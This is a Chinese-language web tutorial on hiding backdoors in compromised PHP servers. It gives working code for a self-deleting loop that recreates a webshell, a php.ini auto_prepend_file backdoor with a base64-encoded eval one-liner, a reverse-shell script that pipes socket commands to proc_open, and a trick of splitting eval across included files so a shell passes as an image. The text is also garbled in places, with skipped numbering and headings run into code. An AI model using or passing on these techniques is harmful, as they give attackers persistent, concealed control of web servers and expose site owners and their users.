php如何隐藏后门
php隐藏后门的方法:1、创建系统隐藏文件;2、利用ADS隐藏文件;3、在php环境变量中留shell;4、设置不死马;5、设置“php.ini”后门;6、将关键字拆分,并进行多文件包含;7、将真正的一句话写入数据库。
推荐:《PHP教程》
php 后门隐藏技巧
1. attrib +s +h
创建系统隐藏文件:
attrib +s +a +r +h
attrib +s +h 文件名
解决覆盖重写或者重启 web 服务删掉即可。<?php
set_time_limit(0);
ignore_user_abort(1);
unlink(__FILE__);
while(1){
file_put_contents('webshell.php','clear');
sleep(1);
}
五. php.ini后门
将下面后门写入php.iniallow_url_include=On
auto_prepend_file="data:;base64,PD9waHAgQGV2YWwoJF9SRVFVRVNUW2NtZF0pOz8+"
// base64 <?php @eval($_REQUEST[cmd]);?>
// 后门类型可自己修改。
这些做好后,重启 web 服务就好了。
方法1. 如果权限很大的话,自己手动重启,缺点容易暴露,重启服务,就要上服务器,某里的服务器,异地登陆有短信提醒。
方法2.就是加载一个 php_socke.php 脚本,让他重新加载 php.ini
此后门,任何php都可菜刀连接<?php
/******************************/
/* 只适用于windows系统 */
/******************************/
while(true){//别问我为什么要死循环,我也不清楚,只有设置成死循环才能加载新的 php.ini ...
@set_time_limit(0);
$system=strtoupper(substr(PHP_OS,0,3));
if(!extension_loaded('sockets'))
{
if($system=='WIN'){@dl('php_sockets.dll')ordie("Can't load socket");}
}
$host='255.255.255.255';// 搞一个不存在的ip,万一给人家反弹过去了岂不是真尴尬了~~~
$port=1998;//别问我为什么是1998,问了我也不会告诉你....
if($system=="WIN"){$env=array('path'=>'c:\\windows\\system32');}
$descriptorspec=array(0=>array("pipe","r"),1=>array("pipe","w"),2=>array("pipe","w"),);
$host=gethostbyname($host);
$proto=getprotobyname("tcp");
if(($sock=socket_create(AF_INET,SOCK_STREAM,$proto))<0){die("Socket创建失败");}
if(($ret=@socket_connect($sock,$host,$port))<0){die("连接失败");}
else{
$message="PHP反弹连接\n";
@socket_write($sock,$message,strlen($message));
$cwd=str_replace('\\','/',dirname(__FILE__));
while($cmd=@socket_read($sock,65535,$proto))
{
if(trim(strtolower($cmd))=="exit"){
socket_write($sock,"Bye\n");exit;
}else{
$process=proc_open($cmd,$descriptorspec,$pipes,$cwd,$env);
if(is_resource($process)){
fwrite($pipes[0],$cmd);
fclose($pipes[0]);
$msg=stream_get_contents($pipes[1]);
socket_write($sock,$msg,strlen($msg));
fclose($pipes[1]);
$msg=stream_get_contents($pipes[2]);
socket_write($sock,$msg,strlen($msg));
$return_value=proc_close($process);
}
}
}
}
}
?>
//此脚本非百分百成功
6. 关键字拆分,多文件包含!
比如一句话:@eval($_POST['x']);我们可以写成$a=$_POST['x'];@eval($a);
我们可以将 $a=$_POST['x'];写入一个文件 POST.php
然后在 @eval($a); 一句话的上方使用 include "POST.php";的方式引用!
的话就导致我们可以对后门隐藏了。。管理员看到的是.jpg 我们却可以 web 用.php 解析来
连接。。。有用的到的可以看看。
php如何隐藏后门的教程已介绍完毕,更多请关注跳墙网其他文章教程!
php如何隐藏后门相关教程